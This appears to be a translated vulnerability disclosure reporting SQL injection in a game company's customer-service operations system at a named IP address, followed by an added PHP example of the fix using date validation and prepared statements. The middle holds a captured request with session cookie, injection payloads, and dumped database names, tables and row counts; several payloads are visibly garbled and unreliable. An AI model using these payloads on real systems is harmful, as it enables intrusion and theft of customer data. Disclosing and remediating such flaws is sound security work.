2016-01-11: Details reported to the vendor, awaiting vendor handling
2016-01-12: Vendor confirmed; details disclosed to the vendor only
2016-01-22: Details disclosed to core white hats and relevant domain experts
2016-02-01: Details disclosed to regular white hats
2016-02-11: Details disclosed to intern white hats
2016-02-22: Details disclosed to the public
Operations system
http://222.73.243.217/
Captured request:

POST /syswork/carryon/carryonlist.php HTTP/1.1
Host: 222.73.243.217
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.73.243.217/syswork/carryon/carryonlist.php
Cookie: PHPSESSID=bess3o040r75dsr9cssnpb49s4
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 135

__EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&game_type=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11&datetext=
Multiple parameters are injectable:

Place: POST
Parameter: datetextE
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND 1919=1919per'='aper&datetext=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' AND (SELECT 46M(SELECT COUNT(*),CONCAT(0x3a786c6f3a,(SELECT (CASE WHEN (4623=4623) THEN 0 END)),0x3a6d6a6b3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTERGROUP BY x)a) AND 'fqTY'='fqTY&datetext=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 16 columns
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11&datetextE=2016-01-11' UNION ALL SELEL, NULL, NULL, CONCAT(0x3a786c6f3a,0x57437461647077797a53,0x3a6d6a6b3a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'nogZZ&datetext=

Place: POST
Parameter: datetextS
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11' AND 7224=7224 AND 'FgUt'='FgUt&date2016-01-11&datetext=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: __EVENTTARGET=datetext&__EVENTARGUMENT=&__VIEWSTATE=YTowOnt9&ype=-1&content=1&datetextS=2016-01-11' AND (SELECT 7654 FROM(SELECT COUNT(CAT(0x3a786c6f3a,(SELECT (CASE WHEN (7654=7654) THEN 1 ELSE 0 END)),0x3a6d,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AQO'='vsQO&datetextE=2016-01-11&datetext=
---
there were multiple injection points, please select the one to use for fol injections:
[0] place: POST, parameter: datetextE, type: Single quoted string (default
[1] place: POST, parameter: datetextS, type: Single quoted string
[q] Quit
>
[18:40:52] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.28
back-end DBMS: MySQL 5.0
[18:40:52] [INFO] fetching current user
current user: 'uYW4Y7N27EDVL@10.240.31.6'
available databases [2]:
[*] information_schema
[*] mobilecsms
122 tables
Database: mobilecsms
[94 tables]
+---------------------------------------+
| KNOWLEDGE                             |
| K_SORTS                               |
| OPERATERECORD                         |
| SHIFTKNOWLEDGE                        |
| SHIFTOPERATERECORD                    |
| SK_SORTS                              |
| account_info_audited                  |
| account_info_audited_log              |
| account_invoice                       |
| account_label                         |
| account_label_to_uid                  |
| account_lock                          |
| account_old_player                    |
| account_query_log                     |
| base_gm_work_field                    |
| base_msg_work_field                   |
| basic_coding                          |
| basic_country                         |
| basic_dept                            |
| basic_faq_sort                        |
| basic_game                            |
| basic_group                           |
| basic_menu                            |
| basic_model                           |
| basic_page                            |
| basic_resource                        |
| basic_resource2dept                   |
| basic_resource2group                  |
| basic_resource2user                   |
| basic_resourceinpage                  |
| basic_role                            |
| basic_skfaq_sort                      |
| basic_treenode                        |
| basic_user                            |
| basic_user2role                       |
| basic_user_online                     |
| basic_userindept                      |
| basic_useringroup                     |
| call_num                              |
| call_sta_time                         |
| cs_carryon                            |
| cs_coutomerinfo                       |
| cs_coutomerinfo_history               |
| cs_dealwithorder                      |
| cs_dealwithorder_history              |
| cs_lost_reason                        |
| cs_lost_reason_order                  |
| cs_order                              |
| cs_order_history                      |
| cs_order_invalid                      |
| cs_order_print                        |
| cs_ordertype                          |
| cs_overtime_sta                       |
| cs_overtime_standard                  |
| cs_overtime_standard_tt               |
| cs_poll                               |
| cs_sta_cust_info                      |
| cs_sta_cust_info_tmp                  |
| cs_standard_reply                     |
| file_upload                           |
| game_gm_work_of_day                   |
| game_log_redeem                       |
| game_log_redeem_audit                 |
| game_msg_work_of_day                  |
| game_redeem                           |
| game_redeem_apply_user                |
| game_redeem_audit                     |
| game_redeem_audit_list                |
| game_redeem_audit_money               |
| game_redeem_item                      |
| game_zone_info                        |
| internal_account                      |
| log_account_disputed                  |
| log_account_rollback                  |
| log_account_rollback_balance          |
| log_fail_itil                         |
| log_gamerole_lock_unlock              |
| order_num_alert_time                  |
| pilfer_account_order                  |
| poll_rating                           |
| ps_template                           |
| ps_template_ordertype                 |
| question_agreement                    |
| question_element                      |
| question_list                         |
| question_table                        |
| role_separation_info                  |
| self_service_config                   |
| send_sms_log                          |
| test                                  |
| tmplog                                |
| uid_notcheck_pay                      |
| user_account_prerogative              |
| user_acotype                          |
+---------------------------------------+

Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
| EVENTS                                |
| FILES                                 |
| GLOBAL_STATUS                         |
| GLOBAL_VARIABLES                      |
| KEY_COLUMN_USAGE                      |
| PARTITIONS                            |
| PLUGINS                               |
| PROCESSLIST                           |
| PROFILING                             |
| REFERENTIAL_CONSTRAINTS               |
| ROUTINES                              |
| SCHEMATA                              |
| SCHEMA_PRIVILEGES                     |
| SESSION_STATUS                        |
| SESSION_VARIABLES                     |
| STATISTICS                            |
| TABLES                                |
| TABLE_CONSTRAINTS                     |
| TABLE_PRIVILEGES                      |
| TRIGGERS                              |
| USER_PRIVILEGES                       |
| VIEWS                                 |
+---------------------------------------+
Database: mobilecsms
+----------+---------+
| Table    | Entries |
+----------+---------+
| cs_order | 149141  |
+----------+---------+

150,000 log entries

Database: mobilecsms
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| send_sms_log | 149379  |
+--------------+---------+
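The following is an added example and is not code from the reported application or from the report's author. It shows how a PHP handler for a date-range filter like the datetextS/datetextE parameters of carryonlist.php can be written so that the injections shown above are not possible: each date is validated as a real YYYY-MM-DD value before any query is built, and the values are then bound as parameters of a prepared statement rather than concatenated into SQL. The table name cs_carryon appears in the report's table list; its columns (id, title, created), the query, and the sample rows are assumptions. The demo runs offline against an in-memory SQLite database with constructed rows.

```php
<?php
// Added example (not the reported application's code). Demonstrates the two
// controls that close a date-parameter injection like the one reported:
// 1) strict validation of the date parameters,
// 2) a prepared statement, so request input can never be parsed as SQL.
// Table and column names are assumed; the rows below are constructed.

declare(strict_types=1);

/**
 * Return $value unchanged if it is a real calendar date in YYYY-MM-DD form,
 * otherwise null. The regex rejects anything with extra characters (quotes,
 * spaces, SQL keywords); the round-trip through DateTime rejects values such
 * as 2016-02-31 that createFromFormat would otherwise silently roll over.
 */
function validateDate(string $value): ?string
{
    if (!preg_match('/^\d{4}-\d{2}-\d{2}$/', $value)) {
        return null;
    }
    $dt = DateTime::createFromFormat('!Y-m-d', $value);
    if ($dt === false || $dt->format('Y-m-d') !== $value) {
        return null;
    }
    return $value;
}

/**
 * Fetch carry-on records whose created date lies in [$start, $end].
 * Throws InvalidArgumentException when either bound is not a valid date.
 * Even if validation were skipped, :s and :e are bound parameters and are
 * sent to the database as string literals, never as SQL text.
 */
function listCarryOn(PDO $db, string $start, string $end): array
{
    $s = validateDate($start);
    $e = validateDate($end);
    if ($s === null || $e === null) {
        throw new InvalidArgumentException('date parameters must be YYYY-MM-DD');
    }
    $stmt = $db->prepare(
        'SELECT id, title, created FROM cs_carryon '
        . 'WHERE created BETWEEN :s AND :e ORDER BY created'
    );
    $stmt->execute([':s' => $s, ':e' => $e]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Self-contained demo: in-memory SQLite with constructed rows (assumed schema).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE cs_carryon (id INTEGER PRIMARY KEY, title TEXT, created TEXT)');
$ins = $db->prepare('INSERT INTO cs_carryon (title, created) VALUES (?, ?)');
foreach ([
    ['shift note A', '2016-01-10'],
    ['shift note B', '2016-01-11'],
    ['shift note C', '2016-01-12'],
] as $row) {
    $ins->execute($row);
}

// Normal request: exactly one row (shift note B) for 2016-01-11.
print_r(listCarryOn($db, '2016-01-11', '2016-01-11'));

// Input shaped like the boolean-based probe in the report is rejected by
// validateDate() before any SQL is built.
try {
    listCarryOn($db, '2016-01-11', "2016-01-11' AND 1919=1919");
} catch (InvalidArgumentException $ex) {
    echo 'rejected: ', $ex->getMessage(), PHP_EOL;
}

// A syntactically plausible but non-existent date is rejected as well.
var_dump(validateDate('2016-02-31')); // NULL
```

Validation and parameter binding are independent layers: the regex is what lets the handler return a clean error to the caller, while the prepared statement is what guarantees that, whatever reaches the query, it is data and not SQL. Removing either one alone still leaves a working defence, which is the point of keeping both.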
Severity: High
Vulnerability Rank: 20
Confirmed at: 2016-01-12 11:48
Thanks to 路人甲; access to this site has now been restricted.
None yet
(⊙0⊙)
Your single rank-20 report: how many Taiwan ones would I have to grind out to match that?
Are you still selling that big lobster of yours?